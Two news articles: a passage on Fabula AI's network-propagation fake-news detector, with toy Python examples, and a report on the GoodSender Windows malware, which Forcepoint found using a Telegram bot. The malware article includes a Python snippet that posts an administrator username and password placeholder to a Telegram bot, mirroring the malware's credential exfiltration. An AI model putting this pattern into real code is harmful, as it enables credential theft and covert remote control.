“The essence of geometric deep learning is it can work with network-structured data. So here we can incorporate heterogenous data such as user characteristics; the social network interactions between users; the spread of the news itself; so many features that otherwise would be impossible to deal with under machine learning techniques,” he continues.
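To make that idea concrete, here is a toy, untrained sketch of one message-passing step over a four-user share graph; it is purely illustrative and is not Fabula’s actual model.

```python
# Toy message-passing step over a tiny share graph: each user's features are
# mixed with the average of their neighbours' features, so *who* spreads a
# story shapes the representation a classifier would see.
import numpy as np

# Adjacency matrix of a 4-user reshare graph (1 = an interaction between users)
A = np.array([[0, 1, 0, 0],
              [1, 0, 1, 1],
              [0, 1, 0, 0],
              [0, 1, 0, 0]], dtype=float)

# Per-user features, e.g. normalised account age and follower count (made up)
X = np.array([[0.9, 0.2],
              [0.1, 0.8],
              [0.2, 0.1],
              [0.3, 0.3]])

degree = A.sum(axis=1, keepdims=True)
H = 0.5 * X + 0.5 * (A @ X) / degree   # one round of neighbourhood averaging

# A random, untrained readout stands in for the fake-vs-real scorer.
w = np.random.default_rng(0).normal(size=2)
score = 1.0 / (1.0 + np.exp(-(H.mean(axis=0) @ w)))
print(f"toy cascade score: {score:.2f}")
```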

Bronstein, who is also a professor at Imperial College London, with a chair in machine learning and pattern recognition, likens the phenomenon Fabula’s machine learning classifier has learnt to spot to the way infectious disease spreads through a population.

“This is of course a very simplified model of how a disease spreads on the network. In this case network models relations or interactions between people. So in a sense you can think of news in this way,” he suggests. “There is evidence of polarization, there is evidence of confirmation bias. So, basically, there are what is called echo chambers that are formed in a social network that favor these behaviours.”

“We didn’t really go into — let’s say — the sociological or the psychological factors that probably explain why this happens. But there is some research that shows that fake news is akin to epidemics.”

The tl;dr of the MIT study, which examined a decade’s worth of tweets, was that not only does the truth spread slower but also that human beings themselves are implicated in accelerating disinformation. (So, yes, actual human beings are the problem.) Ergo, it’s not all bots doing all the heavy lifting of amplifying junk online.

The silver lining of what appears to be an unfortunate quirk of human nature is that a penchant for spreading nonsense may ultimately help give the stuff away — making a scalable AI-based tool for detecting ‘BS’ potentially not such a crazy pipe-dream.

Although, to be clear, Fabula’s AI remains in development, having so far been tested internally on Twitter data sub-sets. And the claims it’s making for its prototype model remain to be commercially tested with customers in the wild using the tech across different social platforms.

It’s hoping to get there this year, though, and intends to offer an API for platforms and publishers towards the end of this year. The AI classifier is intended to run in near real-time on a social network or other content platform, identifying BS.

Fabula envisages its own role, as the company behind the tech, as that of an open, decentralised “truth-risk scoring platform” — akin to a credit referencing agency just related to content, not cash.

Scoring comes into it because the AI generates a score for classifying content based on how confident it is it’s looking at a piece of fake vs true news.

A visualisation of a fake vs real news distribution pattern; users who predominantly share fake news are coloured red and users who don’t share fake news at all are coloured blue — which Fabula says shows the clear separation into distinct groups, and “the immediately recognisable difference in spread pattern of dissemination”.

In its own tests Fabula says its algorithms were able to identify 93 percent of “fake news” within hours of dissemination — which Bronstein claims is “significantly higher” than any other published method for detecting ‘fake news’. (Their accuracy figure uses a standard aggregate measurement of machine learning classification model performance, called ROC AUC.)
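For readers unfamiliar with the metric, here is a minimal example of computing ROC AUC with scikit-learn; the labels and scores are made up for illustration.

```python
# Minimal ROC AUC example with made-up numbers: the metric measures how well
# a model's confidence scores rank fake stories above real ones, across all
# possible decision thresholds.
from sklearn.metrics import roc_auc_score

y_true  = [1, 1, 1, 1, 0, 0, 0, 0]   # 1 = labelled fake, 0 = labelled real
y_score = [0.92, 0.85, 0.75, 0.35, 0.40, 0.30, 0.15, 0.05]  # model confidence

print(roc_auc_score(y_true, y_score))  # ~0.94 here; 1.0 would be a perfect ranking
```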

The dataset the team used to train their model is a subset of Twitter’s network — comprised of around 250,000 users and containing around 2.5 million “edges” (aka social connections).

For their training dataset, Fabula relied on true/fake labels attached to news stories by third-party fact-checking NGOs, including Snopes and PolitiFact. And, overall, pulling together the dataset was a process of “many months,” according to Bronstein. He also says that around a thousand different stories were used to train the model, adding that the team is confident the approach works on small social networks, as well as Facebook-sized mega-nets.

Asked whether he’s sure the model hasn’t been trained to identify patterns caused by bot-based junk news spreaders, he says the training dataset included some registered (and thus verified ‘true’) users.

“There is multiple research that shows that bots didn’t play a significant amount [of a role in spreading fake news] because the amount of it was just a few percent. And bots can be quite easily detected,” he also suggests, adding: “Usually it’s based on some connectivity analysis or content analysis. With our methods we can also detect bots easily.”

To further check the model, the team tested its performance over time by training it on historical data and then using a different split of test data.

“While we see some drop in performance it is not dramatic. So the model ages well, basically. Up to something like a year the model can still be applied without any re-training,” he notes, while also saying that, when applied in practice, the model would be continually updated as it keeps digesting (ingesting?) new stories and social media content.

Somewhat terrifyingly, the model could also be used to predict virality, according to Bronstein — raising the dystopian prospect of the API being used for the opposite purpose to that which it’s intended: i.e. maliciously, by fake news purveyors, to further amp up their (anti)social spread.

“Potentially putting it into evil hands it might do harm,” Bronstein concedes. Though he takes a philosophical view on the hyper-powerful double-edged sword of AI technology, arguing such technologies will create an imperative for a rethinking of the news ecosystem by all stakeholders, as well as encouraging emphasis on user education and teaching critical thinking.

Let’s certainly hope so. And, on the educational front, Fabula is hoping its technology can play an important role — by spotlighting network-based cause and effect.

“People now like or retweet or basically spread information without thinking too much of the potential harm or damage they’re doing to everyone,” says Bronstein, pointing again to the infectious diseases analogy. “It’s like not vaccinating yourself or your children. If you think a little bit about what you’re spreading on a social network you might prevent an epidemic.”

So, tl;dr, think before you RT.

Returning to the accuracy rate of Fabula’s model, while ~93 per cent might sound pretty impressive, if it were applied to content on a massive social network like Facebook — which has some 2.3BN+ users, uploading what could be trillions of pieces of content daily — even a seven percent failure rate would still make for an awful lot of fakes slipping undetected through the AI’s net.

But Bronstein says the technology does not have to be used as a standalone moderation system. Rather, he suggests it could be used in conjunction with other approaches such as content analysis, and thus function as another string to a wider ‘BS detector’s’ bow.

It could also, he suggests, further aid human content reviewers — to point them to potentially problematic content more quickly.

Depending on how the technology gets used, he says, it could do away with the need for independent third-party fact-checking organizations altogether, because the deep learning system can be adapted to different use cases.

Example use-cases he mentions include an entirely automated filter (i.e. with no human reviewer in the loop); or to power a content credibility ranking system that can down-weight dubious stories or even block them entirely; or for intermediate content screening to flag potential fake news for human attention.

Each of those scenarios would likely entail a different truth-risk confidence score. Though most — if not all — would still require some human back-up. If only to manage overarching ethical and legal considerations related to largely automated decisions. (Europe’s GDPR framework has some requirements on that front, for example.)

Facebook’s grave failures around moderating hate speech in Myanmar — which led to its own platform becoming a megaphone for terrible ethnic violence — were very clearly exacerbated by the fact it did not have enough reviewers who were able to understand (the many) local languages and dialects spoken in the country.

So if Fabula’s language-agnostic propagation and user focused approach proves to be as culturally universal as its makers hope, it might be able to raise flags faster than human brains which lack the necessary language skills and local knowledge to intelligently parse context.

“Of course we can incorporate content features but we don’t have to — we don’t want to,” says Bronstein. “The method can be made language independent. So it doesn’t matter whether the news are written in French, in English, in Italian. It is based on the way the news propagates on the network.”

Although he also concedes: “We have not done any geographic, localized studies.”

“Most of the news that we take are from PolitiFact so they somehow regard mainly the American political life but the Twitter users are global. So not all of them, for example, tweet in English. So we don’t yet take into account tweet content itself or their comments in the tweet — we are looking at the propagation features and the user features,” he continues.

“These will be obviously next steps but we hypothesis that it’s less language dependent. It might be somehow geographically varied. But these will be already second order details that might make the model more accurate. But, overall, currently we are not using any location-specific or geographic targeting for the model.

“But it will be an interesting thing to explore. So this is one of the things we’ll be looking into in the future.”

Fabula’s approach being tied to the spread (and the spreaders) of fake news certainly means there’s a raft of associated ethical considerations that any platform making use of its technology would need to be hyper sensitive to.

For instance, if platforms could suddenly identify and label a sub-set of users as ‘junk spreaders’ the next obvious question is how will they treat such people?

Would they penalize them with limits — or even a total block — on their power to socially share on the platform? And would that be ethical or fair given that not every sharer of fake news is maliciously intending to spread lies?

What if it turns out there’s a link between — let’s say — a lack of education and propensity to spread disinformation? As there can be a link between poverty and education… What then? Aren’t your savvy algorithmic content downweights risking exacerbating existing unfair societal divisions?

Bronstein agrees there are major ethical questions ahead when it comes to how a ‘fake news’ classifier gets used.

“Imagine that we find a strong correlation between the political affiliation of a user and this ‘credibility’ score. So for example we can tell with high probability that if someone is a Trump supporter then he or she will be mainly spreading fake news. Of course such an algorithm would provide great accuracy but at least ethically it might be wrong,” he says when we ask about ethics.

He confirms Fabula is not using any kind of political affiliation information in its model at this point — but it’s all too easy to imagine this sort of classifier being used to surface (and even exploit) such links.

“What is very important in these problems is not only to be right — so it’s great of course that we’re able to quantify fake news with this accuracy of ~90 percent — but it must also be for the right reasons,” he adds.

The London-based startup was founded in April last year, though the academic research underpinning the algorithms has been in train for the past four years, according to Bronstein.

The patent for their method was filed in early 2016 and granted last July.

They’ve been funded by $500,000 in angel funding and about another $500,000 in total of European Research Council grants plus academic grants from tech giants Amazon, Google and Facebook, awarded via open research competition awards.

(Bronstein confirms the three companies have no active involvement in the business. Though doubtless Fabula is hoping to turn them into customers for its API down the line. But he says he can’t discuss any potential discussions it might be having with the platforms about using its tech.)

Focusing on spotting patterns in how content spreads as a detection mechanism does have one major and obvious drawback — in that it only works after the fact of (some) fake content spread. So this approach could never entirely stop disinformation in its tracks.

Though Fabula claims detection is possible within a relatively short time frame — of between two and 20 hours after content has been seeded onto a network.

“What we show is that this spread can be very short,” he says. “We looked at up to 24 hours and we’ve seen that just in a few hours… we can already make an accurate prediction. Basically it increases and slowly saturates. Let’s say after four or five hours we’re already about 90 per cent.”

“We never worked with anything that was lower than hours but we could look,” he continues. “It really depends on the news. Some news does not spread that fast. Even the most groundbreaking news do not spread extremely fast. If you look at the percentage of the spread of the news in the first hours you get maybe just a small fraction. The spreading is usually triggered by some important nodes in the social network. Users with many followers, tweeting or retweeting. So there are some key bottlenecks in the network that make something viral or not.”

A network-based approach to content moderation could also serve to further enhance the power and dominance of already hugely powerful content platforms — by making the networks themselves core to social media regulation, i.e. if pattern-spotting algorithms rely on key network components (such as graph structure) to function.

So you can certainly see why — even above a pressing business need — tech giants are at least interested in backing the academic research. Especially with politicians increasingly calling for online content platforms to be regulated like publishers.

At the same time, there are — what look like — some big potential positives to analyzing spread, rather than content, for content moderation purposes.

As noted above, the approach doesn’t require training the algorithms on different languages and (seemingly) cultural contexts — setting it apart from content-based disinformation detection systems. So if it proves as robust as claimed it should be more scalable.

Though, as Bronstein notes, the team have mostly used U.S. political news for training their initial classifier. So some cultural variations in how people spread and react to nonsense online at least remains a possibility.

A more certain challenge is “interpretability” — aka explaining what underlies the patterns the deep learning technology has identified via the spread of fake news.

While algorithmic accountability is very often a challenge for AI technologies, Bronstein admits it’s “more complicated” for geometric deep learning.

“We can potentially identify some features that are the most characteristic of fake vs true news,” he suggests when asked whether some sort of ‘formula’ of fake news can be traced via the data, noting that while they haven’t yet tried to do this they did observe “some polarization”.

“There are basically two communities in the social network that communicate mainly within the community and rarely across the communities,” he says. “Basically it is less likely that somebody who tweets a fake story will be retweeted by somebody who mostly tweets real stories. There is a manifestation of this polarization. It might be related to these theories of echo chambers and various biases that exist. Again we didn’t dive into trying to explain it from a sociological point of view — but we observed it.”

So while, in recent years, there have been some academic efforts to debunk the notion that social media users are stuck inside filter bubbles bouncing their own opinions back at them, Fabula’s analysis of the landscape of social media opinions suggests they do exist — albeit just not encasing every Internet user.

Bronstein says the next step for the startup is to scale its prototype to be able to deal with multiple requests so it can get the API to market in 2019 — and start charging publishers for a truth-risk/reliability score for each piece of content they host.

“We’ll probably be providing some restricted access maybe with some commercial partners to test the API but eventually we would like to make it useable by multiple people from different businesses,” says Bronstein. “Potentially also private users — journalists or social media platforms or advertisers. Basically we want to be… a clearing house for news.”

Decrypted Telegram bot chatter revealed as new Windows malware

Sometimes it takes a small bug in one thing to find something massive elsewhere.

During a recent investigation, security firm Forcepoint Labs said it found a new kind of malware that was taking instructions from a hacker sending commands over the encrypted messaging app Telegram.

The researchers described their newly discovered malware, dubbed GoodSender, as a “fairly simple,” roughly year-old, Windows-based malware that uses Telegram as the method to listen and wait for commands. Once the malware infects its target, it creates a new administrator account and enables remote desktop — and waits. As soon as the malware infects, it sends the username and randomly generated password back to the hacker through Telegram.
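For context on why a bot makes such a convenient command channel, this is roughly what sending a message through Telegram’s public Bot API looks like in general; the token, chat ID and message text below are placeholders, not details from Forcepoint’s research.

```python
# Generic Telegram Bot API sendMessage call (a public, documented endpoint):
# an infected machine needs nothing more than outbound HTTPS to report in.
# Token, chat ID and text are placeholders.
import requests

BOT_TOKEN = "123456:PLACEHOLDER-TOKEN"
CHAT_ID = "987654321"

requests.post(
    f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
    data={"chat_id": CHAT_ID, "text": "new machine: Administrator / <generated password>"},
    timeout=10,
)
```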

It’s not the first time malware has used a commercial service to communicate with its operators. Hackers have hidden commands in pictures posted to Twitter and in comments left on celebrity Instagram posts.

But using an encrypted messenger makes it far harder to detect. At least, that’s the theory.

Forcepoint said in its research out Thursday that it only stumbled on the malware after it found a vulnerability in Telegram’s notoriously bad encryption.

End-to-end messages are encrypted using the app’s proprietary MTProto protocol, long slammed by cryptographers for leaking metadata and having flaws, and likened to “being stabbed in the eye with a fork.” Its bots, however, only use traditional TLS — or HTTPS — to communicate. That leaking metadata makes it easy to man-in-the-middle the connection and abuse the bot API to read a bot’s sent and received messages, but also to recover the full messaging history of the target bot, the researchers say.

When the researchers found the hacker using a Telegram bot to communicate with the malware, they dug in to learn more.

Fortunately, they were able to trace back the bot’s entire message history to the malware because each message had a unique message ID that increased incrementally, allowing the researchers to run a simple script to replay and scrape the bot’s conversation history.

The GoodSender malware is active and sends its first victim information. (Image: Forcepoint)

“This meant that we could track [the hacker’s] first steps towards creating and deploying the malware all the way through to current campaigns in the form of communications to and from both victims and test machines,” the researchers said.
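Conceptually, the replay boils down to walking an incrementing ID space; the sketch below uses a stand-in fetch function rather than the researchers’ actual replayed request.

```python
# Conceptual sketch of why incremental message IDs made the bot's history
# recoverable: walk the ID space and collect whatever comes back.
# fetch_message() is a stand-in, not a real Telegram Bot API method.
from typing import Optional

def fetch_message(bot_token: str, message_id: int) -> Optional[str]:
    """Stand-in for replaying one intercepted bot request by message ID."""
    fake_history = {1: "/start", 2: "victim-pc: Administrator / p4ssw0rd", 3: "screenshot uploaded"}
    return fake_history.get(message_id)

def scrape_history(bot_token: str, max_id: int) -> list:
    history = []
    for message_id in range(1, max_id + 1):   # IDs increase by one per message
        message = fetch_message(bot_token, message_id)
        if message is not None:
            history.append(message)
    return history

print(scrape_history("123456:INTERCEPTED-TOKEN", max_id=3))
```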

Your bot uncovered, your malware discovered — what can make it worse for the hacker? The researchers know who they are.

Because the hacker didn’t have a clear separation between their development and production workspaces, the researchers say they could track the malware author, who used their own computer and didn’t mask their IP address.

The researchers could also see exactly what commands the malware would listen to: take screenshots, remove or download files, get IP address data, copy whatever’s in the clipboard, and even restart the PC.

But the researchers don’t have all the answers. How did the malware get onto victim computers in the first place? They suspect the hacker used the so-called EternalBlue exploit, a hacking tool designed to target Windows computers, developed by and stolen from the National Security Agency, to gain access to unpatched computers. And they don’t know how many victims there are, except that there are likely more than 120 in the U.S., followed by Vietnam, India, and Australia.

Forcepoint informed Telegram of the vulnerability. TechCrunch also reached out to Telegram’s founder and chief executive Pavel Durov for comment, but didn’t hear back.

If there’s a lesson to learn? Be careful using bots on Telegram — and certainly don’t use Telegram for your malware.